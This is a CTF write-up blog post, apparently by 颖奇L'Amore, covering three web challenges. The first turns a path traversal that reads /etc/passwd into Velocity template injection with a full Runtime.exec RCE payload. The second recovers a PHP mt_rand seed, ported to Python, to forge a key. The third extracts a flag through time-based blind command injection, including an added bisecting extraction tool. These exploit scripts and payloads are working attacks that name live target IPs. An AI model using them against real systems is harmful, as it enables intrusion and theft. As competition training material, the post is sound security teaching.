This article was last updated 184 days ago; the information in it may have developed or changed since.
Author:颖奇L’Amore
Blog:www.gem-love.com
zblog
An arbitrary file read was found in the title parameter:
view-source:http://122.112.253.135/?title=../../../../../../../etc/passwd
view-source:http://122.112.253.135/?title=../../../../../../../home/ctf/web/.idea/workspace.xml
<component name="IdeDocumentHistory">
<option name="CHANGED_PATHS">
<list>
<option value="$PROJECT_DIR$/src/main/resources/hello.vm" />
<option value="$PROJECT_DIR$/src/main/resources/aaa" />
<option value="$PROJECT_DIR$/pom.xml" />
<option value="$PROJECT_DIR$/src/main/resources/index" />
<option value="$PROJECT_DIR$/src/main/resources/templates/My First Blog" />
<option value="$PROJECT_DIR$/src/main/resources/templates/hello" />
<option value="$PROJECT_DIR$/src/main/resources/templates/index" />
<option value="$PROJECT_DIR$/src/main/java/Blog.java" />
</list>
</option>
</component>
This gives the source code:
view-source:http://122.112.253.135/?title=../../../../../../../home/ctf/web/src/main/java/Blog.java
import static spark.Spark.*;
import java.io.*;
import org.apache.velocity.Template;
import org.apache.velocity.VelocityContext;
import org.apache.velocity.app.VelocityEngine;
import spark.template.velocity.VelocityTemplateEngine;
import java.io.StringWriter;

public class Blog {
    // Appends to fname with no escaping: whatever arrives in `title` lands in the log verbatim.
    private static void log(String fname, String content) {
        try {
            FileWriter writer = new FileWriter(fname, true);
            writer.write(content);
            writer.close();
        } catch (IOException e) {
        }
    }

    public static void main(String[] arg) {
        staticFiles.location("/public");
        VelocityEngine velocityEngine = new VelocityEngine();
        velocityEngine.setProperty(VelocityEngine.RESOURCE_LOADER, "file");
        // The file loader is rooted at "/", so a traversing `title` reaches any readable file.
        velocityEngine.setProperty(VelocityEngine.FILE_RESOURCE_LOADER_PATH, "/");
        velocityEngine.init();
        VelocityContext context = new VelocityContext();
        get("/", (request, response) -> {
            request.session(true);
            String title = request.queryParams("title");
            if (title != null) {
                // The raw title is written to /tmp/<session id> before the template is loaded ...
                log("/tmp/" + request.session().id(), "Client IP: " + request.ip() + " -> File: " + title + "\n");
                // ... and then concatenated, unvalidated, into the template path.
                Template template = velocityEngine.getTemplate("/home/ctf/web/src/main/resources/templates/" + title);
                StringWriter sw = new StringWriter();
                template.merge(context, sw);
                return sw;
            }
            Template template = velocityEngine.getTemplate("/home/ctf/web/src/main/resources/templates/index");
            StringWriter sw = new StringWriter();
            template.merge(context, sw);
            return sw;
        });
    }
}
This is Velocity template injection leading to RCE. The raw title is appended to /tmp/<session id> before the template lookup, and any file on disk can be loaded as a template through the traversal, so the log file is the injection point: send the payload as title (it gets logged; the template lookup that follows fails, which does not matter), then load /tmp/<session id> through the same traversal so that Velocity renders it and the directives execute. Payload (don't forget to URL-encode it):
#set($s="")#set($stringClass=$s.getClass())#set($stringBuilderClass=$stringClass.forName("java.lang.StringBuilder"))#set($inputStreamClass=$stringClass.forName("java.io.InputStream"))#set($readerClass=$stringClass.forName("java.io.Reader"))#set($inputStreamReaderClass=$stringClass.forName("java.io.InputStreamReader"))#set($bufferedReaderClass=$stringClass.forName("java.io.BufferedReader"))#set($collectorsClass=$stringClass.forName("java.util.stream.Collectors"))#set($systemClass=$stringClass.forName("java.lang.System"))#set($stringBuilderConstructor=$stringBuilderClass.getConstructor())#set($inputStreamReaderConstructor=$inputStreamReaderClass.getConstructor($inputStreamClass))#set($bufferedReaderConstructor=$bufferedReaderClass.getConstructor($readerClass))#set($runtime=$stringClass.forName("java.lang.Runtime").getRuntime())#set($process=$runtime.exec("whoami"))#set($null=$process.waitFor() )#set($inputStream=$process.getInputStream())#set($inputStreamReader=$inputStreamReaderConstructor.newInstance($inputStream))#set($bufferedReader=$bufferedReaderConstructor.newInstance($inputStreamReader))#set($stringBuilder=$stringBuilderConstructor.newInstance())#set($output=$bufferedReader.lines().collect($collectorsClass.joining($systemClass.lineSeparator())))$output
Then read the log file, i.e. request ?title=../../../../../../../tmp/<session id> with the same session cookie, and the command output appears in the rendered page.
easyseed
index.bak:
$lock = random(6, 'abcdefghigklmnopqrstuvwxyzABCDEFGHIGKLMNOPQRSTUVWXYZ');
$key = random(16, '1294567890abcdefghigklmnopqrstuvwxyzABCDEFGHIGKLMNOPQRSTUVWXYZ');
function random($length, $chars = '0123456789ABC') {
    $hash = '';
    $max = strlen($chars) - 1;
    for($i = 0; $i < $length; $i++) {
        $hash .= $chars[mt_rand(0, $max)];
    }
    return $hash;
}
The lock is obtained from the cookie: vEUHaY. The response header X-Powered-By: PHP/5.6.28 gives the PHP version, which matters here: mt_rand() changed in PHP 7.1, and php_mt_seed prints its candidate seeds per version range, so the pre-7.1 candidates are the ones to use. This is the PHP pseudo-random number problem, much like the 枯燥的抽奖 challenge from GWCTF, a classic topic. exp:
<?php
//Y1ng
// Step 1: turn the leaked $lock into php_mt_seed arguments. Each output character
// came from one mt_rand(0, $max) call, so the constraint per call is "index index 0 $max".
function getSeed()
{
    $chars = 'abcdefghigklmnopqrstuvwxyzABCDEFGHIGKLMNOPQRSTUVWXYZ';
    $max = strlen($chars) - 1;
    $hash_result = 'vEUHaY';
    $arr = [];
    $index = 0;
    for ($i = 0; $i < strlen($hash_result); $i++) {
        for ($j = 0; $j < strlen($chars); $j++) {
            // First match wins: the alphabet contains 'g' twice, so a 'g' in the
            // lock would have to be tried with both indexes.
            if ($hash_result[$i] === $chars[$j]) {
                $arr[$index] = $j;
                $index++;
                break;
            }
        }
    }
    echo "./php_mt_seed ";
    for ($i = 0; $i < count($arr); $i++) {
        echo "{$arr[$i]} {$arr[$i]} 0 {$max} ";
    }
    echo "\n";
}

// The challenge's own random() from index.bak, unchanged.
function random($length, $chars = '0123456789ABC') {
    $hash = '';
    $max = strlen($chars) - 1;
    for($i = 0; $i < $length; $i++) {
        $hash .= $chars[mt_rand(0, $max)];
    }
    return $hash;
}

// Step 2: seed with the recovered value and replay index.bak in the same order,
// so $key is drawn from the same stream right after $lock. Run this on PHP < 7.1
// (the target is 5.6.28): mt_rand() changed in 7.1 and gives different output.
function getKey()
{
    mt_srand(718225);
    $lock = random(6, 'abcdefghigklmnopqrstuvwxyzABCDEFGHIGKLMNOPQRSTUVWXYZ');
    $key = random(16, '1294567890abcdefghigklmnopqrstuvwxyzABCDEFGHIGKLMNOPQRSTUVWXYZ');
    echo $lock . ' ' . $key;
}

getSeed(); //./php_mt_seed 21 21 0 51 30 30 0 51 46 46 0 51 33 33 0 51 0 0 0 51 50 50 0 51
getKey(); // vEUHaY nRtqGR8mtd9ZOPyI
The seed brute-forces to 718225, which gives $key = nRtqGR8mtd9ZOPyI. Put it in the cookie and additionally spoof the X-Forwarded-For header as 127.0.0.1 to get the flag.
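A replay of the generator, as an added example rather than the write-up's exp: it ports PHP's pre-7.1 mt_rand() to Python so that a php_mt_seed candidate can be checked offline and the same stream continued to derive $key. The alphabets, the lock vEUHaY and the seed 718225 are the page's values; the seed window scanned by find_seed is chosen around the known seed only to keep the demonstration short (php_mt_seed covers the full 2^32 range in C).

```python
#!/usr/bin/env python3
"""Replay PHP 5.x mt_rand() to verify a recovered seed and derive $key.

Added example, not the write-up's exp. It ports the generator in PHP's
ext/standard/rand.c as it was before 7.1 (kept as MT_RAND_PHP mode in 7.1+):
the twist step keys its constant on the low bit of the current word instead of
the next one, and mt_rand(min, max) scales the raw 31-bit value with the
floating-point RAND_RANGE macro. Because the generator changed in 7.1, the
X-Powered-By: PHP/5.6.28 header decides which variant to replay. Alphabets,
lock vEUHaY and seed 718225 are taken from the write-up.
"""
from __future__ import annotations

N, M = 624, 397
MASK32 = 0xFFFFFFFF
PHP_MT_RAND_MAX = 0x7FFFFFFF

LOCK_CHARS = "abcdefghigklmnopqrstuvwxyzABCDEFGHIGKLMNOPQRSTUVWXYZ"
KEY_CHARS = "1294567890abcdefghigklmnopqrstuvwxyzABCDEFGHIGKLMNOPQRSTUVWXYZ"


class PhpMtRand:
    """mt_srand()/mt_rand() of PHP 5.2.1 - 7.0 (MT_RAND_PHP mode in 7.1+)."""

    def __init__(self, seed: int) -> None:
        self.state = [0] * N
        self.state[0] = seed & MASK32
        for i in range(1, N):   # php_mt_initialize: the standard init_genrand recurrence
            prev = self.state[i - 1]
            self.state[i] = (1812433253 * (prev ^ (prev >> 30)) + i) & MASK32
        self._reload()

    @staticmethod
    def _twist(m: int, u: int, v: int) -> int:
        mixed = (u & 0x80000000) | (v & 0x7FFFFFFF)
        # PHP's legacy deviation: the constant is selected by loBit(u); MT19937 uses loBit(v).
        return m ^ (mixed >> 1) ^ (0x9908B0DF if u & 1 else 0)

    def _reload(self) -> None:   # php_mt_reload: regenerate all N words in place
        s = self.state
        for i in range(N - M):
            s[i] = self._twist(s[i + M], s[i], s[i + 1])
        for i in range(N - M, N - 1):
            s[i] = self._twist(s[i + M - N], s[i], s[i + 1])
        s[N - 1] = self._twist(s[M - 1], s[N - 1], s[0])
        self.left = N
        self.next = 0

    def _next32(self) -> int:   # php_mt_rand: MT19937 tempering
        if self.left == 0:
            self._reload()
        self.left -= 1
        y = self.state[self.next]
        self.next += 1
        y ^= y >> 11
        y ^= (y << 7) & 0x9D2C5680
        y ^= (y << 15) & 0xEFC60000
        return (y ^ (y >> 18)) & MASK32

    def mt_rand(self, lo: int, hi: int) -> int:
        """mt_rand($min, $max): the 31-bit value scaled by PHP 5.x's RAND_RANGE macro."""
        n = self._next32() >> 1
        return lo + int((hi - lo + 1.0) * (n / (PHP_MT_RAND_MAX + 1.0)))


def php_random(rng: PhpMtRand, length: int, chars: str) -> str:
    """The challenge's random(): one mt_rand(0, strlen-1) per output character."""
    max_idx = len(chars) - 1
    return "".join(chars[rng.mt_rand(0, max_idx)] for _ in range(length))


def php_mt_seed_args(lock: str, chars: str = LOCK_CHARS) -> str:
    """Turn the leaked lock into php_mt_seed arguments ("value value 0 max" per call).

    str.index() takes the first match; a repeated letter such as the doubled 'g'
    in this alphabet would need a second run with the other index.
    """
    max_idx = len(chars) - 1
    return " ".join(f"{chars.index(ch)} {chars.index(ch)} 0 {max_idx}" for ch in lock)


def lock_and_key(seed: int) -> tuple[str, str]:
    """Replay index.bak: $lock and then $key are drawn from the same seeded stream."""
    rng = PhpMtRand(seed)
    return php_random(rng, 6, LOCK_CHARS), php_random(rng, 16, KEY_CHARS)


def find_seed(lock: str, candidates: range) -> int | None:
    """Confirm a seed by replay over a small window (php_mt_seed scans all 2^32 in C)."""
    for seed in candidates:
        if php_random(PhpMtRand(seed), len(lock), LOCK_CHARS) == lock:
            return seed
    return None


if __name__ == "__main__":
    print("./php_mt_seed " + php_mt_seed_args("vEUHaY"))
    print(find_seed("vEUHaY", range(718200, 718250)))   # window chosen around the known seed
    print(" ".join(lock_and_key(718225)))
```

The two details that make the replay match byte for byte are the legacy twist and the RAND_RANGE scaling; PHP 7.1 replaced both, which is why the X-Powered-By header decides which of php_mt_seed's candidate seeds applies and why the exp has to be run on a matching PHP version.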
easyweb
The response header says post cmd, so POSTing a cmd parameter runs commands, but the box has no outbound network access, so the output has to come back as a bash time-based blind: a command that sleeps only when a condition on one character of the file holds. The exp from the BJDCTF (3rd) 帮帮小红花 challenge can be reused unchanged apart from switching GET to POST. exp:
#!/usr/bin/env python3
#-*- coding:utf-8 -*-
#__author__: 颖奇L'Amore www.gem-love.com
import requests
import time as t

url = 'http://119.3.37.185/'
alphabet = ['{','}', '.', '@', '_','=','a','b','c','d','e','f','j','h','i','g','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z','0','1','2','3','4','5','6','7','8','9']
result = ''
for i in range(1,50):
    for char in alphabet:
        # First run: locate the flag file by listing / (this found /flag.txt)
        #payload = "if [ `ls / | grep 'flag' |cut -c{}` = '{}' ];then sleep 5;fi".format(i,char)
        # Second run: read it one character at a time; the response stalls 5s on a match
        payload = "if [ `cat /flag.txt |cut -c{}` = '{}' ];then sleep 5;fi".format(i,char)
        data = {'cmd':payload}
        try:
            start = int(t.time())
            r = requests.post(url, data=data)
            end = int(t.time()) - start
            if end >= 3:
                result += char
                print("Flag: "+result)
                break
        except Exception as e:
            print(e)
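A faster variant of the same time-based extraction, added here as an example and not part of the write-up: instead of one request per candidate character, it bisects the byte value with a numeric comparison in sh, so each position costs at most seven requests. The target URL, the cmd parameter and /flag.txt are the write-up's; the offline oracle that runs the condition locally is a constructed stand-in used only to exercise the bisection, and the flag in demo_offline is constructed sample data.

```python
#!/usr/bin/env python3
"""Time-based blind command extraction that bisects each byte.

Added example, not the write-up's exp. The write-up's script needs one request
per candidate character (up to ~65 per position); comparing the byte's numeric
value against a threshold needs at most seven. The cmd parameter and /flag.txt
come from the write-up. local_exec_oracle is a constructed offline stand-in
for the target; the real oracle is the response delay.
"""
import os
import subprocess
import tempfile
import time
import urllib.error
import urllib.parse
import urllib.request
from typing import Callable

Oracle = Callable[[str], bool]   # shell condition -> True when it held on the target


def condition(path: str, pos: int, threshold: int) -> str:
    """POSIX sh test: byte `pos` (1-based) of the file exists and its code is > threshold."""
    return (f"c=$(cut -c{pos} '{path}'); "
            "[ -n \"$c\" ] && [ \"$(printf '%d' \"'$c\")\" -gt " + str(threshold) + " ]")


def timing_payload(cond: str, delay: int = 5) -> str:
    """What actually goes into the cmd parameter: sleep only when the condition holds."""
    return f"if {cond}; then sleep {delay}; fi"


def extract_file(oracle: Oracle, path: str, max_len: int = 64) -> str:
    """Recover the file's first line byte by byte, bisecting the value 0..127 each time."""
    out = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(condition(path, pos, mid)):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:          # `cut` returned nothing: end of the line
            break
        out += chr(lo)
    return out


def timing_oracle(url: str, delay: int = 5, threshold: float = 3.0) -> Oracle:
    """Oracle against the real target: POST cmd=... and measure the response time."""
    def ask(cond: str) -> bool:
        data = urllib.parse.urlencode({"cmd": timing_payload(cond, delay)}).encode()
        start = time.monotonic()
        try:
            urllib.request.urlopen(url, data=data, timeout=delay + 10).read()
        except urllib.error.URLError:
            pass
        return time.monotonic() - start >= threshold
    return ask


def local_exec_oracle(cond: str) -> bool:
    """Constructed offline stand-in: run the condition in sh and report its exit status."""
    return subprocess.run(["sh", "-c", cond]).returncode == 0


def demo_offline(flag: str = "flag{constructed_sample}") -> str:
    """Write a constructed flag to a temp file and extract it through the local oracle."""
    fd, path = tempfile.mkstemp(suffix=".txt")
    with os.fdopen(fd, "w") as f:
        f.write(flag + "\n")
    try:
        return extract_file(local_exec_oracle, path)
    finally:
        os.unlink(path)


if __name__ == "__main__":
    print(demo_offline())
    # Against the challenge: print(extract_file(timing_oracle("http://119.3.37.185/"), "/flag.txt"))
```

The 5-second sleep and 3-second threshold are the write-up's; on a jittery link raise both, because one false positive corrupts the bisection of that whole byte rather than just appending a wrong character.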
Original article by 颖奇L'Amore; when reposting, credit the author and link to the article.
Article link: https://www.gem-love.com/ctf/2612.html